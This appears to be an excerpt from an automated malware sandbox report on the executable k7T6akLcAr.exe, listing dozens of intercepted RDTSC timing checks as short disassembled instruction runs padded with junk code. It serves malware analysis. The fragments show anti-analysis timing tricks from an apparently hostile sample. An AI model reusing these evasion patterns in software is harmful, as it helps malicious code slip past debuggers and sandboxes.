              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEE126 second address: FEE14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F14Dh 0x00000009 pop edi 0x0000000a pushad 0x0000000b jmp 00007F335931F150h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEE14B second address: FEE161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBBEh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEFE1B second address: FEFE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEFE21 second address: FEFE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007F335854CBC2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FEFE2E second address: FEFE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF3625 second address: FF3629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF31FC second address: FF3202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF3202 second address: FF320C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F335854CBB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF320C second address: FF3238 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F335931F146h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F335931F14Ch 0x00000012 jp 00007F335931F146h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d jnp 00007F335931F146h 0x00000023 jg 00007F335931F146h 0x00000029 push esi 0x0000002a pop esi 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8AF4 second address: FF8AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8AF8 second address: FF8B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F335931F159h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8B20 second address: FF8B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8C7E second address: FF8C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8C82 second address: FF8C8C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F335854CBB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8DD3 second address: FF8DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F14Dh 0x00000009 jl 00007F335931F146h 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8DEB second address: FF8DF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8DF1 second address: FF8DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF8F37 second address: FF8F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F335854CBB6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F335854CBC5h 0x00000012 jmp 00007F335854CBC2h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF90D8 second address: FF90FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F335931F152h 0x0000000f jl 00007F335931F146h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF90FB second address: FF9101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF9101 second address: FF9105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FF9105 second address: FF911F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FFDCB0 second address: FFDCB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FFDCB6 second address: FFDCC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FFDCC0 second address: FFDCD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F14Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FFDE50 second address: FFDE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FFDFEF second address: FFDFF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F335931F146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FFDFF9 second address: FFDFFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FFE2BD second address: FFE2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F335931F159h 0x0000000c jmp 00007F335931F151h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: FFE550 second address: FFE555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10018DA second address: 10018DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1001045 second address: 100105C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F335854CBB6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100105C second address: 1001077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F14Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F335931F146h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1001077 second address: 100107D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10011CA second address: 10011CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10011CE second address: 10011DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F335854CBB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10011DE second address: 10011E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100132E second address: 1001338 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F335854CBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100160E second address: 1001614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1006ED3 second address: 1006EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F335854CBC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100751E second address: 1007522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10077D4 second address: 10077D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10080D6 second address: 1008102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F151h 0x00000009 jmp 00007F335931F157h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1008102 second address: 100811A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F335854CBB6h 0x00000008 je 00007F335854CBB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F335854CBB6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100811A second address: 100811E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1008726 second address: 100872C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100872C second address: 1008760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F335931F14Ch 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e jmp 00007F335931F154h 0x00000013 pop ebx 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 jbe 00007F335931F146h 0x0000001d pop edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1008760 second address: 100876A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F335854CBB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1008AAF second address: 1008AE5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F335931F157h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007F335931F14Fh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F335931F155h 0x00000019 push esi 0x0000001a pop esi 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1008AE5 second address: 1008AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100C962 second address: 100C96A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CA9B second address: 100CAB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F335854CBBEh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007F335854CBB6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CAB9 second address: 100CABD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CABD second address: 100CAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007F335854CBB6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CAD0 second address: 100CAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CAD4 second address: 100CADA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CADA second address: 100CAF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F335931F157h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CC5B second address: 100CC88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC7h 0x00000007 jmp 00007F335854CBC2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CDE0 second address: 100CDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F335931F14Eh 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CDFD second address: 100CE05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100CE05 second address: 100CE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100D0F9 second address: 100D103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F335854CBB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 100D56E second address: 100D588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F335931F154h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1010444 second address: 1010448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1010448 second address: 1010463 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F157h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1010463 second address: 1010468 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BE92 second address: 101BEAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F335931F14Eh 0x0000000a pushad 0x0000000b popad 0x0000000c je 00007F335931F146h 0x00000012 js 00007F335931F14Eh 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BFEA second address: 101BFF6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BFF6 second address: 101C00F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F155h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C00F second address: 101C041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 ja 00007F335854CBB6h 0x0000000f jno 00007F335854CBB6h 0x00000015 jmp 00007F335854CBC7h 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C041 second address: 101C057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F335931F146h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e jnl 00007F335931F146h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C4E9 second address: 101C4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C667 second address: 101C66C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C66C second address: 101C69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F335854CBBDh 0x00000012 jg 00007F335854CBB6h 0x00000018 jmp 00007F335854CBBBh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C872 second address: 101C87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F335931F146h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C87C second address: 101C880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101C880 second address: 101C89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F335931F156h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101CCD9 second address: 101CCDF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101DC31 second address: 101DC37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101DC37 second address: 101DC4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F335854CBBFh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BA33 second address: 101BA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F335931F14Eh 0x0000000a jns 00007F335931F146h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BA45 second address: 101BA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F335854CBB6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BA51 second address: 101BA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 101BA55 second address: 101BA6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335854CBC5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C12 second address: 1024C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335931F152h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C28 second address: 1024C38 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F335854CBB6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C38 second address: 1024C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F335931F154h 0x00000007 jmp 00007F335931F153h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C63 second address: 1024C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F335854CBB6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C6D second address: 1024C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C71 second address: 1024C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C77 second address: 1024C9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F335931F14Eh 0x0000000d jmp 00007F335931F14Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1024C9A second address: 1024C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10324DF second address: 1032500 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F335931F14Bh 0x0000000e pushad 0x0000000f jmp 00007F335931F14Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103204B second address: 103206A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F335854CBBDh 0x00000009 popad 0x0000000a jmp 00007F335854CBBAh 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 10321D9 second address: 10321E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F335931F146h 0x00000008 jne 00007F335931F146h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 1039BB1 second address: 1039BB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E928 second address: 103E92C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\k7T6akLcAr.exeRDTSC instruction interceptor: First address: 103E92C second address: 103E941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F335854CBBFh 0x0000000b rdtsc
